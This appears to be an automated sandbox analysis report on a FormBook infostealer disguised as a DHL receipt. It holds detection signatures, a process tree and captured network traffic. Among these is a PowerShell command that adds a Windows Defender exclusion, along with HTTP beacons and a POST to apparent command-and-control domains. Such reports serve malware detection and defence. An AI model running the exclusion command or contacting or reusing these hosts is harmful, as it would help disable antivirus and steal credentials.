Edit tour

Windows Analysis Report
DHL AWB Receipt_pdf.bat.exe

Overview

General Information

Sample name:	DHL AWB Receipt_pdf.bat.exe
Analysis ID:	1633358
MD5:	311bbc0d3eafc1ca8e9a160c2094c901
SHA1:	69e60f676ccd5ec36d6305cdf4969396b703fc44
SHA256:	786f963d1274cbbd163bbc25e9f2fc2ee600b6b84bf98f80e138a1487e4ee4d2
Tags:	batDHLexeuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

DHL AWB Receipt_pdf.bat.exe (PID: 8484 cmdline: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe" MD5: 311BBC0D3EAFC1CA8E9A160C2094C901)

powershell.exe (PID: 8552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DHL AWB Receipt_pdf.bat.exe (PID: 8560 cmdline: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe" MD5: 311BBC0D3EAFC1CA8E9A160C2094C901)

DHL AWB Receipt_pdf.bat.exe (PID: 8576 cmdline: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe" MD5: 311BBC0D3EAFC1CA8E9A160C2094C901)

ncTysvq0lOMZbadjWC.exe (PID: 5320 cmdline: "C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\103tecq79U7.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

EhStorAuthn.exe (PID: 8804 cmdline: "C:\Windows\SysWOW64\EhStorAuthn.exe" MD5: 0C9245FDD67B14B9E7FBEBB88C3A5E7F)

ncTysvq0lOMZbadjWC.exe (PID: 6840 cmdline: "C:\Program Files (x86)\EnxSIsvkjllxLqdngcsifWdgnchIdHGZFXLkasMyiHktkMkAwRmluDdUvTCNPHvLqWxgSmAr\xE0Wnjmnih.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 9200 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.3759977939.0000000003090000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3760294780.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.1506080108.0000000000F00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3762178583.00000000051C0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3758608396.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.1509448492.0000000002100000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.1505225494.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3760130827.0000000003530000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: DHL AWB Receipt_pdf.bat.exe PID: 8484	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.DHL AWB Receipt_pdf.bat.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.DHL AWB Receipt_pdf.bat.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 8484, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ProcessId: 8552, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe, ParentProcessId: 8484, ParentProcessName: DHL AWB Receipt_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe", ProcessId: 8552, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DHL AWB Receipt_pdf.bat.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.quo1ybjmkhdqljoz.top/19my/?Fvy=joqcG+fZarPVQJ7S+4ZxvY2vtL9RD/Utjvk256BrCJs1qxhBI0rorZURoJn8TQLNAH2gxgdx7fps/CVRzREwfPP0r8vHEjg0J00zP6qmwy5/OKoRIycWhPpqQdbWJej8Uw==&bd6T=PjIHZ8TPURqt

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: DHL AWB Receipt_pdf.bat.exe	Virustotal: Detection: 44%			Perma Link
Source: DHL AWB Receipt_pdf.bat.exe	ReversingLabs: Detection: 52%

Yara detected FormBook

Source: Yara match	File source: 4.2.DHL AWB Receipt_pdf.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.DHL AWB Receipt_pdf.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3759977939.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3760294780.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1506080108.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3762178583.00000000051C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3758608396.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1509448492.0000000002100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1505225494.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3760130827.0000000003530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: EhStorAuthn.pdbGCTL source: DHL AWB Receipt_pdf.bat.exe, 00000004.00000002.1506278244.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 00000005.00000002.3759335395.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL AWB Receipt_pdf.bat.exe, 00000004.00000002.1506888943.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3760575972.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.1508445982.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.1505407554.00000000049E8000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3760575972.0000000004EDE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL AWB Receipt_pdf.bat.exe, DHL AWB Receipt_pdf.bat.exe, 00000004.00000002.1506888943.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, EhStorAuthn.exe, 00000006.00000002.3760575972.0000000004D40000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.1508445982.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000003.1505407554.00000000049E8000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3760575972.0000000004EDE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: EhStorAuthn.pdb source: DHL AWB Receipt_pdf.bat.exe, 00000004.00000002.1506278244.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 00000005.00000002.3759335395.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ncTysvq0lOMZbadjWC.exe, 00000005.00000000.1429494390.00000000004EF000.00000002.00000001.01000000.0000000A.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3758611583.00000000004EF000.00000002.00000001.01000000.0000000A.sdmp

Source: C:\Windows\SysWOW64\EhStorAuthn.exe

Code function: 6_2_02CCC720 FindFirstFileW,FindNextFileW,FindClose,

6_2_02CCC720

Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 4x nop then xor eax, eax	6_2_02CB9E80
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 4x nop then pop edi	6_2_02CBE45E
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Code function: 4x nop then mov ebx, 00000004h	6_2_04BA04DF

Networking

Performs DNS queries to domains with low reputation

Source:	DNS query: www.031233435.xyz
Source:	DNS query: www.publicblockchain.xyz
Source:	DNS query: www.multo.xyz

Source: global traffic	TCP traffic: 192.168.2.5:65357 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.5:49925 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 144.76.229.203 144.76.229.203
Source: Joe Sandbox View	IP Address: 23.29.115.2 23.29.115.2

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wuv4/?bd6T=PjIHZ8TPURqt&Fvy=2OIhpue752EZ90/IvIOXIVPMrLw233bVQ3MPFxfgDOdW1S8/arxwgjd2lghQxPvp+gghQveeWAHTWLXRjOMCRNuXwDr216DBxJqwrztqafm0gN7GWo7wazhUvMW/D9sNzA== HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.loonerverse.appUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /esw3/?Fvy=STIHOi9CYFClakjV40da904kxu04fSTg15TVg9rRTe6RIWG0ngBkAmIpkbb4lCp8vZ5PbVNvG6nxo4giTwSjTWldf3EKfrFwCElolvucyT5INFTCRjeylmDK6mihpn7uUQ==&bd6T=PjIHZ8TPURqt HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.primepath.netUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /frae/?bd6T=PjIHZ8TPURqt&Fvy=KcpF0TU1XcHay6iLVQUXGDReeie9um98isUAx1G3kizVKrvyU48KAqtS1EQtSF28ARfeHCcJEKKBEr6rT3kku1OzbK5yiK6noV5aH1cMop/1tMHAh9Rfx/ZornT1cvdxLg== HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.031233435.xyzUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /19my/?Fvy=joqcG+fZarPVQJ7S+4ZxvY2vtL9RD/Utjvk256BrCJs1qxhBI0rorZURoJn8TQLNAH2gxgdx7fps/CVRzREwfPP0r8vHEjg0J00zP6qmwy5/OKoRIycWhPpqQdbWJej8Uw==&bd6T=PjIHZ8TPURqt HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.quo1ybjmkhdqljoz.topUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /lp5v/?bd6T=PjIHZ8TPURqt&Fvy=7yIrJbTkKXcZ3P0KGr/Koo24hNJO/SgHVLeScBlqQKklxLvgBpJLKramFPJZQILeALwCbIGrsNSTHBUkDfJ2FkJN9qB3VnlreG336VlsRFxuGNUJREHaslKquVMcUYYxhA== HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.publicblockchain.xyzUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /piuf/?Fvy=YCNZp8d5iXit/W0AorWaWt7d4xAAmtdp36jPY/C6OJXNmYBtndpnLj0XSaiYBStqm/SDNtVWLS5HnYm1prURu2gkZni0KV25495YYQVjjOAmXfWkpHxpYmfFMe+ykUCf6A==&bd6T=PjIHZ8TPURqt HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.multo.xyzUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ty1w/?bd6T=PjIHZ8TPURqt&Fvy=DmU+BbsPdbeZ2oth7eqVH4IxkOLk6Zp/22nZgrH0plfMc3nD0zI48kMWd79FMLpDsXRjkkg28/qOhccmO28DKB7uL0+Vw2px/OOdkCjvCA4RBa4gXyq2/Cl2LwjArqGdZw== HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.tkloqr.infoUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /acnz/?Fvy=4AOqIRL3pTX0nNGi+lOPSRSyx/iWc+VNgOr/RdoxqxyE7WxJ0cGBT5xqcnG7h+9L/Gcmqaxm6woK1RcVOdtmlygepuDbgjx8TrlAGHAV/0a3Ooi8Z9K5OsEAJsLCu/irBQ==&bd6T=PjIHZ8TPURqt HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.streaay.liveUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /qnz1/?bd6T=PjIHZ8TPURqt&Fvy=R+Oteo3rh3f7nhB2gSiRNKBizK43zE0qallxSves6Vu4hZ6h0oWNPYtUeAXf+7K/BC0XOkjfNAq1UFaiNKAvUuxTTHBcMTuCJqSn7igyXIXCBr+LpjPOdBGcjRnmk/kZJw== HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.77zhibo.netUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /bio5/?Fvy=7nMcQ+p/VAEQ2azQobfLLk4wRClPro4nkTeWIV8mecaktUDEYNaH1yi6Gw2pgnszfL4ShPP5kx9f65xk5DOH6uuiHc4YC+tLjkWWBGbbvYq75oa+pjtqeeHcG0lj96z8LA==&bd6T=PjIHZ8TPURqt HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.thefounder.ceoUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /2dxw/?bd6T=PjIHZ8TPURqt&Fvy=53Ecfr8B68ed/Blg+8N/NSWf2AxVSX5XzowAhVF0Im0gjpOoyg3aVrzjUCT/Cf1+dwJRkAgo8V3FznBqNeiDzdYfw3xDcQr8Se8sECh3iguJ/J/JYFBf2UKrXqcOWenkdA== HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.rbopisalive.cyouUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /j7xf/?Fvy=EoO1UT5Wd2PGx3MxjK+kz3siU+40EUNjjQBsBAQWNKytFXrnqux0YvA75VbZy52yQ1EBW1TgMDX5nQfvFmbNI4J+GjHKZe38e6p27Nznz96ZmHa0/sD4fpipy8dpJoiSEg==&bd6T=PjIHZ8TPURqt HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.spacewalker.appUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /5o3b/?Fvy=aMDQ2zlSfVAnRg1MbENUzA6lEcrkPshwQ1hE+7gf/URoUExZouIubEid9yVe9hJJbXBuu3jvryMBZzKz5ikAWWAc1/kk2litQM6UNr9O2sHGk833jxyzNeps1dY3SETauQ==&bd6T=PjIHZ8TPURqt HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ufin89.bizUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.loonerverse.app
Source: global traffic	DNS traffic detected: DNS query: www.primepath.net
Source: global traffic	DNS traffic detected: DNS query: www.031233435.xyz
Source: global traffic	DNS traffic detected: DNS query: www.quo1ybjmkhdqljoz.top
Source: global traffic	DNS traffic detected: DNS query: www.publicblockchain.xyz
Source: global traffic	DNS traffic detected: DNS query: www.multo.xyz
Source: global traffic	DNS traffic detected: DNS query: www.tkloqr.info
Source: global traffic	DNS traffic detected: DNS query: www.streaay.live
Source: global traffic	DNS traffic detected: DNS query: www.77zhibo.net
Source: global traffic	DNS traffic detected: DNS query: www.thefounder.ceo
Source: global traffic	DNS traffic detected: DNS query: www.rbopisalive.cyou
Source: global traffic	DNS traffic detected: DNS query: www.spacewalker.app
Source: global traffic	DNS traffic detected: DNS query: www.ufin89.biz

Source: unknown

HTTP traffic detected: POST /esw3/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cache-Control: max-age=0Content-Length: 204Connection: closeContent-Type: application/x-www-form-urlencodedHost: www.primepath.netOrigin: http://www.primepath.netReferer: http://www.primepath.net/esw3/User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36Data Raw: 46 76 79 3d 66 52 67 6e 4e 56 4e 53 56 54 69 4d 64 58 4b 48 68 57 4e 41 70 46 70 46 34 4d 68 39 48 55 37 63 38 4c 4c 48 34 71 62 2b 58 50 43 62 49 51 33 6a 77 52 6c 77 4f 47 6f 77 71 75 50 36 79 53 4a 38 73 34 68 53 62 58 63 4a 4a 4b 65 51 67 36 73 48 43 6a 75 46 51 31 56 46 4a 48 59 79 4c 4e 56 61 47 56 56 64 67 4f 75 4c 68 53 45 63 4b 52 71 52 56 7a 50 54 33 55 57 31 35 30 61 35 67 52 65 39 4b 71 68 47 61 33 57 35 4c 71 56 77 30 37 2b 6d 65 32 70 39 48 45 30 32 6b 62 34 33 42 35 2f 32 7a 54 50 42 6c 4c 5a 50 44 6e 32 34 47 2b 47 37 56 68 33 72 59 63 4f 6b 32 70 50 49 6e 61 75 62 73 71 78 76 36 4c 63 3d Data Ascii: Fvy=fRgnNVNSVTiMdXKHhWNApFpF4Mh9HU7c8LLH4qb+XPCbIQ3jwRlwOGowquP6ySJ8s4hSbXcJJKeQg6sHCjuFQ1VFJHYyLNVaGVVdgOuLhSEcKRqRVzPT3UW150a5gRe9KqhGa3W5LqVw07+me2p9HE02kb43B5/2zTPBlLZPDn24G+G7Vh3rYcOk2pPInaubsqxv6Lc=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 10 Mar 2025 08:22:24 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 265Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 6f 6e 65 72 76 65 72 73 65 2e 61 70 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.loonerverse.app Port 80</address></body></html>
